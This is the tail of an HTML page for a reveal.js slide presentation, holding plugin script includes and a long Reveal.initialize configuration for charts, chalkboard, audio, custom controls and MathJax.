  	<script src="libs/reveal.js/4.1.3/plugin/anything/plugin.js"></script>
	  <script src="libs/reveal.js/4.1.3/plugin/anything/Chart.min.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3/d3.v3.min.js"></script>				
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3.patch.js"></script>			
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3/queue.v1.min.js"></script>		
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3/topojson.v1.min.js"></script>		
	<script src="libs/reveal.js/4.1.3/plugin/anything/function-plot.js"></script>

 <!--	<script src="libs/reveal.js/4.1.3/plugin/audio-slideshow/plugin.js"></script>  -->
<!--	<script src="libs/reveal.js/4.1.3/plugin/audio-slideshow/recorder.js"></script>-->
<!--	<script src="libs/reveal.js/4.1.3/plugin/audio-slideshow/RecordRTC.js"></script>-->

<script src="libs/reveal.js/4.1.3/plugin/chalkboard/plugin.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/customcontrols/plugin.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/embed-tweet/plugin.js"></script>

	<script src="libs/reveal.js/4.1.3/plugin/chart/chart.min.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/chart/plugin.js"></script>

  <script>

		const printPlugins = [
			RevealNotes, 
			RevealHighlight,
			RevealMath,
			RevealAnimate,
			RevealChalkboard, 
			RevealEmbedTweet,
			RevealChart,
		];

		const plugins =  [...printPlugins,
		RevealZoom, 
		RevealSearch, 
				RevealMarkdown, 
				RevealMenu, 
				RevealFullscreen,
				RevealAnything,
				//RevealAudioSlideshow,
				//RevealAudioRecorder,
				RevealCustomControls, 
				// poll
				// question
				// seminar
				 ]


		// Also available as an ES module, see:
		// https://revealjs.com/initialization/
		Reveal.initialize({
			controls: true,
			controlsTutorial: true,
			controlsLayout: 'bottom-right',
			controlsBackArrows: 'faded',
			progress: true,
			slideNumber: false,
			//#showSlideNumber "all" "print" "speaker"
			hash: true,//#  hash: false,
			//# respondToHashChanges: true,
			//# history: false,
			keyboard: true,
			//#keyboardCondition: null,
			overview: true,
			center: true,
			touch: true,
			loop: false,
			rtl: false,
			//#navigationMode: 'default', linear grid
			shuffle: false,
			fragments: true,
			fragmentInURL: false,
			embedded: false,
			help: true,
			//#pause: true
			showNotes: false,
			autoPlayMedia: false, // TODO fix this to a nullable value
			//#preloadIframes: null. true false
			//#autoAnimate: true
			//#autoAnimateMatcher: null,
			//#autoAnimateEasing: 'ease',
			//autoAnimateDuration: 1.0,
			//#autoAnimateUnmatched: true
			//#autoAnimateStyles: []
			autoSlide: 0, // TODO fix this to a falseable value
			autoSlideStoppable: true,
			autoSlideMethod: '0',
			defaultTiming: 120,
			mouseWheel: false,
			//#previewLinks: false
			//#postMessage: true,  // TODO : this can cause issues with the vscode api ???
			//#postMessageEvents: false,
			//#focusBodyOnPageVisibilityChange: true,
			transition: 'slide',
			transitionSpeed: 'default',
			backgroundTransition: 'fade',
			//#pdfMaxPagesPerSlide: Number.POSITIVE_INFINITY,
			//#pdfSeparateFragments: true,
			//#pdfPageHeightOffset: -1,
			viewDistance: 3,
			//#mobileViewDistance: 2,
			display: 'block',
			//#hideInactiveCursor: true,
			//#hideCursorTime: 5000

			// Parallax Background
			parallaxBackgroundImage: '',
			parallaxBackgroundSize: '',
			parallaxBackgroundHorizontal: 0,
			parallaxBackgroundVertical: 0,
			
			//Presentation Size
			width: 960,
			height: 700,
			margin: 0.04,
			minScale: 0.2,
			maxScale: 2,
			disableLayout: false,

			audio: {
				prefix: 'audio/', 	// audio files are stored in the "audio" folder
				suffix: '.ogg',		// audio files have the ".ogg" ending
				textToSpeechURL: null,  // the URL to the text to speech converter
				defaultNotes: false, 	// use slide notes as default for the text to speech converter
				defaultText: false, 	// use slide text as default for the text to speech converter
				advance: 0, 		// advance to next slide after given time in milliseconds after audio has played, use negative value to not advance
				autoplay: false,	// automatically start slideshow
				defaultDuration: 5,	// default duration in seconds if no audio is available
				defaultAudios: true,	// try to play audios with names such as audio/1.2.ogg
				playerOpacity: 0.05,	// opacity value of audio player if unfocused
				playerStyle: 'position: fixed; bottom: 4px; left: 25%; width: 50%; height:75px; z-index: 33;', // style used for container of audio controls
				startAtFragment: false, // when moving to a slide, start at the current fragment or at the start of the slide
			},
			
			chalkboard: { // font-awesome.min.css must be available
					//src: "chalkboard/chalkboard.json",
					storage: "chalkboard-demo",
				},
			
			customcontrols: {
					controls: [
      						{
						  id: 'toggle-overview',
						  title: 'Toggle overview (O)',
						  icon: '<i class="fa fa-th"></i>',
						  action: 'Reveal.toggleOverview();'
						}
						,
						{ icon: '<i class="fa fa-pen-square"></i>',
						  title: 'Toggle chalkboard (B)',
						  action: 'RevealChalkboard.toggleChalkboard();'
						},
						{ icon: '<i class="fa fa-pen"></i>',
						  title: 'Toggle notes canvas (C)',
						  action: 'RevealChalkboard.toggleNotesCanvas();'
						}
				]
			},
			chart: {
					defaults: { 
						color: 'lightgray', // color of labels
						scale: { 
							beginAtZero: true, 
							ticks: { stepSize: 1 },
							grid: { color: "lightgray" } , // color of grid lines
						},
					},
					line: { borderColor: [ "rgba(20,220,220,.8)" , "rgba(220,120,120,.8)", "rgba(20,120,220,.8)" ], "borderDash": [ [5,10], [0,0] ] }, 
					bar: { backgroundColor: [ "rgba(20,220,220,.8)" , "rgba(220,120,120,.8)", "rgba(20,120,220,.8)" ]}, 
					pie: { backgroundColor: [ ["rgba(0,0,0,.8)" , "rgba(220,20,20,.8)", "rgba(20,220,20,.8)", "rgba(220,220,20,.8)", "rgba(20,20,220,.8)"] ]},
					radar: { borderColor: [ "rgba(20,220,220,.8)" , "rgba(220,120,120,.8)", "rgba(20,120,220,.8)" ]}, 
			},
			math: {
				mathjax: 'https://cdn.jsdelivr.net/gh/mathjax/mathjax@2.7.8/MathJax.js',
				config: 'TeX-AMS_HTML-full',
				// pass other options into `MathJax.Hub.Config()`
				TeX: { Macros: { RR: "{\\bf R}" } }
				},
				anything: [ 
				{
		className: "plot",
		defaults: {width:500, height: 500, grid:true},
		initialize: (function(container, options){ options.target = "#"+container.id; functionPlot(options) })
	 },
	 {
		className: "chart",  
		initialize: (function(container, options){ container.chart = new Chart(container.getContext("2d"), options);  })
	 },
	 {
		className: "anything",
		initialize: (function(container, options){ if (options && options.initialize) { options.initialize(container)} })
	 },
					],
			// Learn about plugins: https://revealjs.com/plugins/
			plugins: (window.location.search.match(/print-pdf/gi) ? printPlugins : plugins ) 
		});
			


	    // Change chalkboard theme : 
		function changeTheme(input) {
			var config = {};
			config.theme = input.value;
			Reveal.getPlugin("RevealChalkboard").configure(config);
			input.blur();
		}

		// // Handle the message inside the webview
        // window.addEventListener('message', event => {

        //     const message = event.data; // The JSON data our extension sent

        //     switch (message.command) {
        //         case 'refactor':
        //             Reveal.toggleHelp();
        //     }
        // });

		if (window.location.search.match(/print-pdf-now/gi)) {
      		setTimeout(() => {
				window.print();
			  }, 2500);
			
    }
		

	</script>

</body>

</html>